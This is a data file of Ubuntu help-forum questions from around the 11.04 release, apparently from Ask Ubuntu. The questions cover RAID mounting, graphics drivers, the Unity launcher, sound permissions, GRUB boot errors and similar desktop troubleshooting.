37514	how do i recover my raid partition after the ubuntu 11.04 upgrade ?	my raid drive was working well with ubuntu 10.10 , but after doing an upgrade i am no longer able to mount my raid drive . i think it is due to a invalid raid description similar to this problem : http : //ubuntuforums.org/showthread.php ? t=1503104 thing is , i never had mdadm installed as far as i can tell . how do i change it back so that my system recognizes the raid drive . the raid drive is configured from some sort of software raid on my motherboard i think . blkid gives the output : /dev/ramzswap0 : type= '' swap '' /dev/sda : type= '' promise_fasttrack_raid_member '' /dev/sdb1 : uuid= '' a-uuid-number '' type= '' ext4 '' /dev/sdb5 : uuid= '' another-uuid-number '' type= '' swap '' /dev/sdc1 : uuid= '' another-uuid-number '' type= '' ntfs '' /dev/sdd : type= '' promise_fasttrack_raid_member '' any help is much a appriciated .
37519	removing conky drop shadow	i 've started using conky with 11.04 and want to remove it 's drop shadow . i 've tried setting any & ! ( class=conky ) in the shadow windows text box of the window decoration section . this works . however , every time i try and use either the global menu or an app indicator menu , compiz crashes . not all the time , it seems quite random on which menu it chooses to crash on , but it happens enough to not use this method . so i was just wondering if there was any other way of removing the shadow from the conky window . thanks ,
37520	best visual debugger for kernel	i have managed to get a user-mode-linux kernel compiled . now i can debug a kernel as a regular user process and track how it works . this i can do using gdb but i 'm much more used to visual debuggers and want to see and work with the code without needing to learn gdb commands . is there a good wrapper for gdb where i can control and see the code at the same time . i do n't need an ide since i am not really changing the code . i have tried ddd but it is really slow and the interface is non-standard .
37521	review / edit startup programs rembered by `` remember currently running applications ''	i recently hit the `` remember currently running applications '' button and unchecked `` automatically remember ... '' and now i seem to be stuck with a lot of stuff on startup . none of it is listed under `` startup programs '' ( and what is -- pidgin , skype -- launches twice ) . is there a way to edit or review the `` currently running applications '' that are remembered ?
37525	how do i recover my raid partition after the ubuntu 11.04 upgrade ?	my raid drive was working well with ubuntu 10.10 , but after doing an upgrade i am no longer able to mount my raid drive . i think it is due to a invalid raid description similar to this problem : http : //ubuntuforums.org/showthread.php ? t=1503104 thing is , i never had mdadm installed as far as i can tell . how do i change it back so that my system recognizes the raid drive . the raid drive is configured from some sort of software raid on my motherboard i think . blkid gives the output : /dev/ramzswap0 : type= '' swap '' /dev/sda : type= '' promise_fasttrack_raid_member '' /dev/sdb1 : uuid= '' a-uuid-number '' type= '' ext4 '' /dev/sdb5 : uuid= '' another-uuid-number '' type= '' swap '' /dev/sdc1 : uuid= '' another-uuid-number '' type= '' ntfs '' /dev/sdd : type= '' promise_fasttrack_raid_member '' any help is much a appriciated .
37530	`` pm : resume disk failed '' error	i have noticed that this version 10.04 , all installations that i do ... . always shown this error : '' pm : resume disk failed '' mesage this is shown by the command : dmesg | grep-i failed ( if i want to test on your system ) i 've done a search and i know that pm is related to hibernation of the system ... someone can tell me how to fix or tell me if this error has any impact on the system ? thanks , fabio
37531	how do i remove all packages from a certain repository ?	for a smooth upgrade from 10.04 to 10.10 , i would like to remove all packages which are not in the default repositories ( e.g . chromium ppa and third-party repositories ) . what is the easiest way ( preferably cli ) to find and remove these packages ? edit : this question is not restricted to ppa 's , i have a x2go repository as well , so i 'm looking for a generic command to remove packages belonging to a certain repository . for ppa 's , the question how can ppas be removed has great answers .
37539	which backend does cairo use on ubuntu ?	does cairo on ubuntu use the x11 or the opengl backend ? and if someone knows : does the opengl backend render everything on the cpu and then just display it using opengl or does it use the shaders to do the rendering ? and which opengl version/extensions does it require ? is it much faster ?
37545	why is s-video out not working on an acer 5720z	i have an acer 5720z which has an s-video out port . i have been using this port primarily to view videos on my television . this worked perfectly under 9.10 , 10.04 and 10.10 but under 11.04 it does not work at all . under 10.10 i would go into system - > prefrences - > monitors and it will pick up the external monitor connection and show a desktop on the tv perfectly . but after i performed an upgrade to 11.04 it would show the monitor in the monitor preferences window but nothing on the tv . i thought something might have been mucking it up from the upgrade so i backed up my home directory on an external drive and did a clean install . still nothing after installing and running updates . i thought it might be something with unity mucking it up so i logged out and logged back in under ubuntu classic . still nothing showing . i do n't know if this is similar to this bug on launchpad : https : //bugs.launchpad.net/ubuntu/+source/compiz/+bug/723002 it 's not quite the same outcome of the bug but it did involve external monitors not functioning properly . is there a fix for this issue ?
37548	pdf to word conversion software ?	is there any free software available on ubuntu that can convert a pdf file to a .doc file ?
37552	how do i adjust the terminal shell window width ?	does anyone know how to adjust the default width for shell window in ubuntu , so that i do n't have to re-size it every time i open it up ?
37554	why ( again ) ubuntu 's recommended version ( for 11.04 ) is 32bit , not 64bit ?	11.04 is already available . but why 32bit is again recommended and what 's `` wrong '' with x64 ? p.s . i know about this question , but this is kinda different .
37555	will unity work with an ati mobility radeon hd 4250 ?	i 'm about to purchase a laptop with this graphics card ( cheap deal ) but i read that ati cards have issues or may even not work with natty . is this true ? is there a way to fix the eventual problem ? are proprietary drivers needed or the included drivers will do fine ? thanks a lot for your advice , if i get the laptop and ca n't run unity , it would be pretty much a waste of money to me .
37556	how do i set up sip voice calling in empathy ?	i would like to use empathy for internet voice chat , but i do not see an option under the empathy accounts menu to create a sip account . how do i set up internet voice calling in empathy ?
37558	global application menus implemented for libreoffice in stable release ?	the natty betas never implemented global menus for libreoffice . have global menus been implemented in the stable release of natty ?
37560	why are ksoftirqd -processes pushing my cpu-load to 100 % ?	when i suspend or hibernate my laptop , the ksoftirqd/0 or ksoftirqd/1 process runs on 100 % continuously . i have to reboot or shutdown my laptop then . this happens in ubuntu 10.04 , 10.10 , 11.04 and all variants .
37563	macbook keyboard layout – swapped keys § and `	i have mid-2010 mbp , left of 1 it has §± key , apparently in some older models that are the only ones mentioned in ubuntu docs , there used to have `~ key there . in ubuntu 11.04 with us-mac keyboard layout i have them swapped . the issue occurs only with built-in keyboard , with external one it works fine . is there an easy way to fix that ? the layout i have is same as this :
37564	no sound on an asus 1018p	how can i enable sound in natty ? everything is on but i get no sound .
37568	where is the netbook edition ?	i ca n't find the new 11.04 version of the netbook edition on the ubuntu webpages . also my mirror does not contain any netbook iso 's . has ubuntu for netbooks died ?
37571	resolving dependencies related to 32 bit libraries on 64 bit	i am struggling to make a 32bit application ( related to adobe air ) work on my 64bit ubuntu system . the application starts fine but there is no sound . after running the application from the terminal , i've noticed the following error messages : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so gtk-warning ** : /usr/lib/gtk-2.0/2.10.0/immodules/im-ibus.so : wrong elf class : elfclass64 gtk-warning ** : loading im context type 'ibus ' failed gtk-warning ** : /usr/lib/gtk-2.0/2.10.0/immodules/im-ibus.so : wrong elf class : elfclass64 gtk-warning ** : loading im context type 'ibus ' failed i suspect the following errors could be resolved by a careful update/downgrade of some specific libraries in the ia32 package . since i am not a linux expert i was wondering if someone could suggest me some ways to try to fix the above error messages . thanks .
37572	how would i store desktop icon placement ?	short story : when doing a clean natty install , is it possible to salvage the old desktop icon locations and bring them into the new user desktop ? long story : i accidentally the graphics driver earlier today , but thankfully , natty came out and i can do a clean install . all the files are backed up and there would generally be no problem doing that , except there are two other users on this pc and they have very elaborate layouts of the desktop icons . this is also why they will only use the classic desktop . just shuffling the icons is not an option . i ca n't make a screenshot of the current layouts , because , well , the nvidia driver is no more . is there a file where nautilus stores desktop icon locations ? a gconf entry perhaps ?
37575	how to update to 11.04 through flash drive ?	my internet is pretty slow on one of my ubuntu computers and it is running 10.10 . i just want to know if i am able to update to 11.04 through my flash drive . i would like to know . thank you .
37580	increasing ubuntu partition space	i have a laptop configured with dual boot ( ubuntu and win7 ) . partition in which ubuntu in installed is running out of space ( alloted only 15 gb space earlier ) .i want to use one of my empty partition for ubuntu . as far as i know i think i have two option to do that to increase the ubuntu partition size first is to merg that free partition using gparted into it , but that will take lots of time since that free partition is located to the left of ubuntu partition ( comes before on disk addressing space ) so gparted will have to shift whole 15 gb of existing data in ubuntu partition towards left . other option is to export one of my root director like /usr ( or other that consumes lots of space ) to that partition . so , i have following questions : which option is safe , efficient and comfortable . if i were to export one of root dir ( like /usr ) which one should i export and how . i think /usr should be the one since user programs are installed in it which constitute major portion of space . any other better way of doing this ? ?
37582	where is the tomboy panel applet ?	i just installed natty on my laptop and i noted that my tomboy applet is missing . i click over panel and choose add to panel to try find it but it is n't there . are there some way to restore this applet ? i like it so much !
37584	dropbox gone from indicator area after upgrade to 11.04	i upgraded from 10.10 to 11.04 today , so i 'm using unity now , and dropbox has disappeared from the indicator area . it still works , but it 's hard to use now . i 've already tried removing it and reinstalling from the site . i noticed that this readds the dropbox repository to the apt sources ( the upgrade disabled it ) , but it 's a maverick source . how can i get it back ?
37589	alsa permissions	everything was working great about 3 hours ago on my maverick machine . then my clumsy fingers typed chown -r someuser : somegroup . * , and before i had noticed the dot , i hit enter , and bam , half my system was owned by someuser before i could stop it . needless to say , after much banging of head against wall , i managed to chown everything back to root ( namely , /sbin , /etc , /lib , and some stuff under /usr ) . i apt-get -- reinstall installed a pile of packages , including alsa . unfortunately , now , alsa does n't work for non-root users . that is , sudo aplay /usr/share/sounds/alsa/noise.wav works fine , but as an unprivileged user , it spits out `` can not find card '0 ' '' . although adding my users to the audio group might work , i 'd read many places that this is no longer the solution to these problems . so that leaves me with the question - where should i look to find my hosed permissions ?
37590	nvidia drivers not working after upgrade . why can i only see terminal ?	tonight i upgraded to 11.04 . problems . once i had finished the upgrade , i restarted my computer as it told me too . when i got past the ubuntu 11.04 ( purple background orange dots ) , it simply went to the terminal and asked me to log in . i tried to restart the x server with `` sudo service gdm restart '' but no display popped up . i happened to have a few nvidia drivers in my downloads file also so i gave these a try , but the `` install script '' failed . after all this i booted ubuntu in graphic failsafe mode . i then decided to see what would happen if i removed the proprietary driver . upon doing this and rebooting my ubuntu booted into graphical mode `` yay ! '' . so without the nvidia drivers i can finally see something other than terminal , but , i need those nvidia drivers for my work . so what can i do ? i have tried installing the new nvidia linux drivers from the nvidia website , and have tried installing the recommended driver via `` additional drivers '' , but both have resulted in my being stuck in terminal . if you can help or give me some advice please do ! i am really in a very bad situation ...
37591	why is n't compizconfigsettings manager installed along side unity ?	if unity is shipped by default , and using compizconfigsettings is recommended for configuration , should n't compizconfigsettings manager be installed along with it ?
37593	how can i move application indicators ?	hello everyone ! i just installed the new ubuntu release , natty , and i already love the integration of the application indicators . nevertheless , after installing a few , i was n't able to find a way to reorganise them ( for example putting the weather indicator next to the clock , etc. ) . is there any ( easy ? ) way to move around these application indicators ? thanks for the answer : ) !
37596	realtek alc1200 sound input	i 'm using realtek audio card in msi gx620 laptop $ cat /proc/asound/card0/codec # * | grep codec codec : realtek alc1200 codec : motorola si3054 codec : nvidia mcp78 hdmi $ uname -a linux machine 2.6.32-31-generic-pae # 61-ubuntu smp fri apr 8 20:00:13 utc 2011 i686 gnu/linux i 'm using ubuntu 10.04 unfortunately i can not catch any microphone true input . usb ones work perfectly . internal one too . anny suggestions ? i 've tried gnome alsa mixer . no luck .
37600	gnome 3 ppa was unstable until april 28th , so is it ok now ?	everything i read said that the gnome 3 ppa for natty would be very experimental , cause sudden death , etc until april 28th . well , today is april 28th , so if i start using gnome 3 from the ppa will it work entirely correctly now ?
37601	resilience of btrfs inside raid5	btrfs currently lacks fsck , risking corruption if there 's a power failure . to what extent , if at all , would creating a btrfs filesystem within a raid5 array mitigate this ?
37602	is there a gmail notifier that works with multiple accounts ?	is there something equivalent to gnome-gmail-notifier for unity and unity 2d on ubuntu 11.04/11.10 ? 'equivalent ' means that it must notify about new emails from multiple normal gmail and google apps gmail accounts .
37603	gnome-do - should n't it be more stable ?	gnome-do just drove my cpu to 100 % for over a minute for no apparent reason . had to kill the process to stop the fans from blowing themselves apart . i had other problems with gnome-do - sometimes it does n't recognize any command . i have to restart it so that it can become of any use . i really like the idea and vast array of plugins , but should n't it be more reliable ? are there any alternatives to this software ? another thing - i have never reported a bug . what should i read so that my report is useful to the developers ?
37604	sftp upload script , there is no key	i need to upload a file to a server . the server uploads using sftp . after authentication , any command execution is forbidden , so i can not ssh directly in , i need to get directly into the sftp subsystem . for instance . ssh -n user @ example.com works fine , except i ca n't sftp anything . however , i can do sftp user @ example.com just fine . problem : i need to automate this , the authentication is keyboard-interactive , not key-based . i do n't own the server i 'm connecting to , they simply said `` here 's the password , upload the files every week . '' and nobody over there knows anything about keys or stuff like that . sftp -b batch scripts wo n't allow keyboard interactive auth . i 'm sick of manually uploading the file . they sent the 8-charecter password over unencrypted email and it contains 3 of the same numbers at the end and one dictionary word ( ie `` words777 '' ) -- lets pretend security really is n't an issue here . can i make the ssh key from just the password ? remember , i do n't have access to the other server . can i script this some way ? i 've attempted using different packages , and even rsync to do the upload , but they all want to access ssh directly instead of directly getting into the sftp subsystem .
37608	how can i put the launcher on the other display ?	when i plug an external monitor into my laptop , the laptop screen is still considered my primary display . since my laptop is on the right of my external monitor , i now have the launcher sort of `` in the middle '' . how do i get the launcher and the bfb onto my external monitor ?
37611	open source cursor animations apps	are there open source apps eqivalent to cursor fx ?
37612	now that 11.04 is out will 10.04 still upgrade to 10.10 ?	i have been running 10.10 on my laptop and like it . i would like to upgrade my 10.04 lts box at home by just enabling normal releases in update manager . should this work , or have i caused a problem by waiting past the 11.04 release ?
37617	my ati radeon video card still has quite bad performance in ubuntu 11.04	this question might be answered , but i would like to get an answer . i should have 11.04 beta 2 , but because i have updated the packages , then i guess i have 11.04 `` retail '' . and i have an ati radeon hd 4800 video card . when i was using ubuntu 10.10 , then effects , for example the wobbly windows , were very fast and looked great . but now , they are quite laggy . is there anything to do to help that ?
37618	is turbo boost working ?	i recently purchased a laptop with a sandy bridge cpu that is supposed to have turbo boost . is turbo boost supported in 11.04 ? how can i tell if it 's working ? i tried this but it seems to only detect nehalem cpus .
37619	what kernels exist for toshiba 's ac100 and where to get them ?	i have an ac100 and know that there is the possibility to flash a custom kernel and boot ubuntu that way . also , there are several kernel-versions around that work only in certain circumstances . what i want to know now is what versions there are and where to get them . i 'll ask another question for how to install them , what the install options are ( internal emmc and/or sd-card/usb-flashdrive ) . edit : it looks like everything is changing too fast to get a satisfying answer .
37622	banshee does n't support bubble notifications ? ( libnotify )	i just installed natty 64 bit . i love those notify-osd notifications in rhythmbox but in banshee they are not here . i guess that this is because of we ca n't minimize apps to tray ( only to launcher ) . so i installed rhythmbox again ... notify osd notifications works fine here but in this case i ca n't see rhythmbox icon in the launcher . any idea ?
37626	how do i install the elementary theme ?	is there a way of installing elementary theme in natty ?
37629	geforce go 7300/7400 blacklisted , can i still run unity ?	unity wo n't run on my new ubuntu 11.04 install ( with a nvidia geforce go 7400 ) . ubuntu classic desktop works though , i tried all different drivers provided in the repositories . doing system â administration â additional drivers gives me a warning : this driver is activated but not currently in use . i even tried the nvidia driver from the official homepage . after some googling , i found the tool /usr/lib/nux/unity_support_test -p which tells me that my card is blacklisted . the other tests show a green yes . is this a bug ? or is my card too old which would be pretty surprising for me : p ? thanks .
37630	upgrade 10.10 to 11.04	i wonder , is it safe upgrade 10.10 to 11.04 , probably sometimes upgrade gives problems ...
37632	is there an alternative to microsoft office visio ?	are there any alternatives to microsoft office visio for ubuntu ?
37639	tried to upgrade from 10.04 - > 11.04 , how to fix broken packages ?	i tried to upgrade 10.04 - > 11.04 . long story short , i had to terminate the upgrade process , and now i ca n't start it again . it says different stuff about broken packages , dependencies , and i have no idea how to fix this . here 's what i 've tried : you have 2 broken packages on your system ! use the `` broken '' filter to locate them . ok , i located them , tried to mark for reinstall , removal , etc , but i can not apply changes : could not apply changes ! fix broken packages first . what should i do now ? also i tried : ilya @ ilya-x38-dq6 : ~ $ sudo apt-get upgrade -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libc6 : depends : libc-bin ( = 2.12.1-0ubuntu10.2 ) but 2.13-0ubuntu13 is installed libnih1 : depends : libc6 ( > 2.13~ ) but 2.12.1-0ubuntu10.2 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies
37641	hosting files , such as pdfs , alongside your code on launchpad	i 'm using launchpad to host the code for my masters project and would like to host file that are ancillary to the project , such as documentation in pdf format , alongside the code . i 've been looking around my project page but have been unable to find anything that looks like it will do this . is there a 'file upload ' mechanism built into launchpad , or do i simply have to push them out as a branch of their own ?
37642	what is this `` slab '' that i am seeing in my session file ?	i 'm going through the contents of .config/gnome-settings/saved-session per review / edit startup programs rembered by `` remember currently running applications '' and for the most part , i know what i 'm looking at : skype , firefox , thunderbird , pidgin , compiz . there 's a .desktop that launches slab however that is total greek to me : name=slab comment=client 10569c3d37c1bbff11303905894371800000041980039 which was automatically saved icon=system-run type=application startupnotify=true x-gnome-autostart-startup-id=10569c3d37c1bbff11303905894371800000041980039 exec=slab -- sm-config-prefix /slab-uq6gwk/ -- sm-client-id 10569c3d37c1bbff11303905894371800000041980039 -- screen 0 i tried looking around in the ubuntu package manager for a hint , but there 's no package named `` slab '' there . so i 'm wondering : what is this ?
37648	how can i set up that the menu bar on the left is always shown ?	hey , i alway will see may menu bar on the left site . so i can switch faster between programms . in the ubuntu netbookremix 10.04 it was no prblem . but now the status bar is hide by default and i cant find a way to change it . so is there a way to change ?
37651	how can i activate unity ?	i previously had ubuntu 10.10 installed and upgraded to 11.04 . however , desktop is same 10.10 ( gnome ) as despite the upgrade . how can i disable the gnome and activate unity instead ?
37654	how can i remove window shadows in unity ?	i tried turning the shadows off with ccsm , but it does not work ; / system info : ubuntu 11.04 nn x64 desktop , hp probook 4520s , unity
37656	how do i quit banshee ?	when i press the x button in banshee 's title bar , it hides , but the music continues playing . however , from time to time i need to quit banshee completely . how can i do that ? ( pressing `` close '' from the menu bar does n't help ) i know i could go for running killall banshee but that 's not an elegant solution . any other ideas ? is it even possible ? edit : after first few answers i noticed i must underline , i do not want to stop the music playback , i do not want to hide banshee 's window . what i want is to quit banshee totally , in order f.e . to start jack audio server ( and for example restart banshee ) .
37662	how do i install the ubuntu emoticons in empathy ?	in october 2010 , otto greenslade of the canonical design team has published the so called ubuntu emoticons in a post on the design blog . in a post on omg ! ubuntu ! it was explained how you could set them for pidgin , which is not the default im client in ubuntu 11.04 at least . how can i do the same for empathy so that the program uses this set of emoticons ?
37663	screen , windows , and menus are flickering horribly	i just installed 11.04 ( with updates/ubuntu extras installed ) . i am using a dell dimension 3000 , and it is apparently not capable of running unity . there was no flickering during the install , but once i rebooted and logged in , it was so bad that everything on the screen was unreadable . clicking on a menu will cause it to open , but it flickers so as to be unreadable . if you hover over the options , they will be visible for a moment , but it will them continue flickering . if i immediately open firefox upon login and touch nothing else ( no menus , panels , or other windows ) , then i am able to use firefox without the flickering , but the panels look fragmented and corrupted . here are a couple screenshots , which i hope have turned out okay ( since as soon as i take the screenshot everything will begin flickering : p ) . http : //imgur.com/a/nbi0h note that in this second image that the 'take screenshot ' window is actually no longer open -- the image just sticks to the screen anyway . my graphics card : 00:02.0 vga compatible controller : intel corporation 82865g integrated graphics controller ( rev 02 ) things i have tried : as soon as i saved the second screenshot , my whole machine froze up . after absolutely no response to anything after ~10 minutes , i unplugged the machine ( shudder ) and started it up again . thankfully , firefox saved my post , and i was able to submit it . this flickering happens in ubuntu classic as well , and menus flicker . adding the phrase `` i915.modeset=0 '' immediately before `` quiet splash '' did stop the flickering . however , it also changed my princeton monitor 's resolution to 640x460 . should i follow the instructions here ? note : my monitor is marked as `` unknown '' in the monitor settings window . there are n't any other resolutions available in the dropdown . i have succeeded in making the change persistent . i will let you know how fixing the resolution goes . edit4 : the instructions did n't work . here 's the terminal output : jacob @ hawaiian-punch : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 640 x 480 , maximum 640 x 480 default connected 640x480+0+0 0mm x 0mm 640x480 0.0* 1280x1024_60.00 ( 0xf9 ) 109.0mhz h : width 1280 start 1368 end 1496 total 1712 skew 0 clock 63.7khz v : height 1024 start 1027 end 1034 total 1063 clock 59.9hz jacob @ hawaiian-punch : ~ $ cvt 1280 1024 # 1280x1024 59.89 hz ( cvt 1.31m4 ) hsync : 63.67 khz ; pclk : 109.00 mhz modeline `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync jacob @ hawaiian-punch : ~ $ xrandr -- newmode `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync xrandr : failed to get size of gamma for output default x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 150 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 19 current serial number in output stream : 19 jacob @ hawaiian-punch : ~ $ just tried jacob @ hawaiian-punch : ~ $ xrandr -- rmmode `` 1280x1024_60.00 '' xrandr : failed to get size of gamma for output default tried a lower resolution , that did not work either jacob @ hawaiian-punch : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 640 x 480 , maximum 640 x 480 default connected 640x480+0+0 0mm x 0mm 640x480 0.0* 1280x1024_60.00 ( 0x10d ) 109.0mhz h : width 1280 start 1368 end 1496 total 1712 skew 0 clock 63.7khz v : height 1024 start 1027 end 1034 total 1063 clock 59.9hz 1024x768_60.00 ( 0x110 ) 63.5mhz h : width 1024 start 1072 end 1176 total 1328 skew 0 clock 47.8khz v : height 768 start 771 end 775 total 798 clock 59.9hz jacob @ hawaiian-punch : ~ $ cvt 1024 768 # 1024x768 59.92 hz ( cvt 0.79m3 ) hsync : 47.82 khz ; pclk : 63.50 mhz modeline `` 1024x768_60.00 '' 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync jacob @ hawaiian-punch : ~ $ xrandr -- newmode `` 1024x768_60.00 '' 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync xrandr : failed to get size of gamma for output default x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 150 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 19 current serial number in output stream : 19 jacob @ hawaiian-punch : ~ $ i found a workaround . i undid the change to grub , and installed unity 2d . there is no flickering of any kind in unity 2d , and the resolution is just right . however , feel free to ask me anything else if someone would like to know more about the bug .
37669	problem mounting drive	i asked this question earlier . i opted for mearging the ubuntu partition with the free partition , since i was not sure with the size for /home . thing went bad grub got corrupted , may be because ubuntu partition uuid was changed due to partition deletion . after googling for some time i got that problem fixed using this post but now i am not able to view my win7 partition in linux . here is my partition table configuration ( from gpartd ) : now when i try to mount win7 drive i get following error : error mounting : mount exited with exit code 1 : helper failed with : mount : according to mtab , /dev/sda5 is already mounted on / mount failed another problem that i am at loss of 3gb of space on sda5 ( ubuntu ) partition . gparted is showing its a 35 gb partition but disk utility shows its a 38 gb partition as shown bellow : why is it so.how do i recover it . edit : contents of /etc/fstab :
37676	good python application for source code studying	i am currently learning python and i would like to study the source code of a well written all python application . can you point me in the right direction ? i am particularly interested in database access and web programming .
37682	no grub display after installing aside windows 7	i had a win 7 ( 32 bit ) on dell vostro 1500 ( t9300cpu ) . now i installed natty and restart but no grub were displayed . i give 8gb to root and 2gb to swap and about 8.5gb to home section . root and home are ext4 partition format . what 's the problem ? how can i fix it ?
37687	can i receive twitter updates without granting write permissions for my twitter account ?	i want to configure a shared computer to display public updates from a specific twitter account and hashtag . how can i do this without having to grant gwibber write permissions to my own twitter account ? what i want to avoid is this :
37688	erased application and files from the launcher , how do i get them back ?	help ! i deleted the application launcher in unity , along with the files and folders launcher ! how do i get them back ?
37690	ca n't get wireless card to be recognized - dell d630 - broadcom bcm4311	below are the results for sudo lshw -c network command . i believe `` unclaimed '' refers to missing drivers . *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f1ffc000-f1ffffff *-network description : ethernet interface product : netxtreme bcm5755m gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 02 serial : 00:1c:23:2f:06:45 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.116 firmware=5755m-v3.29 latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory : f1ef0000-f1efffff
37691	how do i remove top panel on dual screen on secondary monitor ?	how do i remove top bar on secondary monitor ? ?
37692	grub : `` invalid arch independent elf magic '' after install on ssd	i 've got a brand new laptop with a 128gb ssd drive . i read that aligning the partitions to match the erase block size of the ssd is important . i followed william scott 's guide ssd tweaks in linux and aligning partitions and my partitions ended up being : $ sudo fdisk -lu /dev/sda disk /dev/sda : 128.0 gb , 128035676100 bytes 32 heads , 32 sectors/track , 244208 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00037bd2 device boot start end blocks id system /dev/sda1 * 1024 206847 102912 83 linux /dev/sda2 206848 16985087 8389120 82 linux swap / solaris /dev/sda3 16985088 250068991 116541952 83 linux then i installed ubuntu natty and specified the partitions manually so that /dev/sda1 became the /boot partition formatted with ext2 , /dev/sda2 the swap and /dev/sda3 the / formatted with ext4 . after the installation the thing did n't boot , and i ended up in the grub-rescue console which does n't make any sense to me . it 's giving me : error : invalid arch independent elf magic . grub rescue > have i done some mistakes during my installation ? how do i solve the issue with grub-recovery ?
37693	add vim to unity launcher ?	please can someone explain how to add a launcher icon in unity ( along the left side ) for vim - or any other terminal-based application ? i press alt+f2 , type vim , and drag the icon to the left ... but the launcher does not accept the dragged item . assuming that to launch vim in a terminal i should launch gnome-terminal -e vim , my question is how do i get this command as a button in the unity launcher ?
37695	colour profiles in gnome color manager	i 'm trying to change contrast/brightness on my monitor , thus i downloaded gnome color manager . it says there is no color profile for my monitor . then i inserted the monitor 's driver cd and imported some color profiles from it . however , gnome color manager told me that the profiles i imported are missing information for whole-screen color correction . i tried searching the web for colour profiles with not much luck . on windows i could easily change the brightness/contrast using the ati catalyst control center . what can i do with this on natty ? is there another option ? the osd options of my monitor do n't do what i want , they work awkwardly . measuring color with an expensive device is out of question . the monitor is a xerox xa3-17 .
37696	how to set ubuntu as wireless accespoint in the gui way ?	my aim is to make my ubuntu machine be a wireless accesspoint using wifi . of course i found two askubuntu questions already treating that ; this one and that one . nevertheless , as far as i am concerned i would like to set up such a network in the graphical user interface ( gui ) way . please avoid solutions with the command line . so a solution suggesting to use network manager would be really welcomed . please name and describe very precisely each step , so i can easily find the equivalent in my own language . thank you for your answers ! if useful for any , here is the output of sudo lshw -c network : *-network description : wireless interface product : wifi link 5100 vendor : intel corporation physical id : 0 bus info : pci @ 0000:07:00.0 logical name : wlan0 version : 00 serial : xx : xx : xx : xx : xx : xx width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-24-generic firmware=8.83.5.1 build 33692 ip=192.168.1.127 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:45 memory : c0800000-c0801fff *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : c0 serial : xx : xx : xx : xx : xx : xx capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:47 memory : c0300000-c033ffff ioport:2000 ( size=128 )
37700	dump dpkg package list for fresh installation	i 've heard that i can dump the dpkg package list of currently installed applications , then after i re-install , re-import that list and have apt or dpkg do all the heavy lifting for me getting my apps re-installed . how do i do this ?
37706	embedding album art while ripping	ubuntu one just released an update to the music app for android and it says that it will now show embedded album art . i 'd like to try this out , but i ca n't figure out how to embed the album art while ripping the cd . i use sound juicer , is there anyway to get this to work ?
37707	what are the different colors on the unity launcher icons ?	example : my question is simple . what are the different colors representing in the unity launcher background for each icon . i mean , it seems consistent ( firefox is always orange ) , but it 's not jumping out at me what the pattern is . on my screen , it 's : firefox : orange chrome : yellow terminal : grey rdp app : blue keypassx : green netbeans : blue i 'd like to turn it off if possible , but first i 'd like to understand more about it . any launcher experts ?
37711	sound works for only one user at a time	i 've noticed that sound becomes unavailable to me when someone else is logged into my machine and playing music ( or has facebook open ) in the other account . i 've had to ask them to unlock their account and turn it off so i can get sound in my own stuff . even in sound preferences , the hardware itself disappears and output is `` dummy sound '' . is there a way to prevent this from happening ? what would be really good is if i could turn down the volume ( or mute entirely ) all the sounds on all other accounts on a per-user basis from my sound preferences without affecting whatever setting they have - essentially saying whenever user a is logged in , all sounds from user b 's account are muted and anything from user c 's account is at 50 % while i can still have my own at full volume .
37713	is it possible to customize shortcuts in unity dash ?	for example , substitute `` check email '' with empathy , or shotwell with gthumb ? can we do it ?
37714	my terminal is invisible	i have just moved to natty from maverick and suddenly my terminal is invisible . i can type commands and they get executed , but i do n't see a thing - only cursor changes when the terminal area is active . what might be wrong and how can i fix it ?
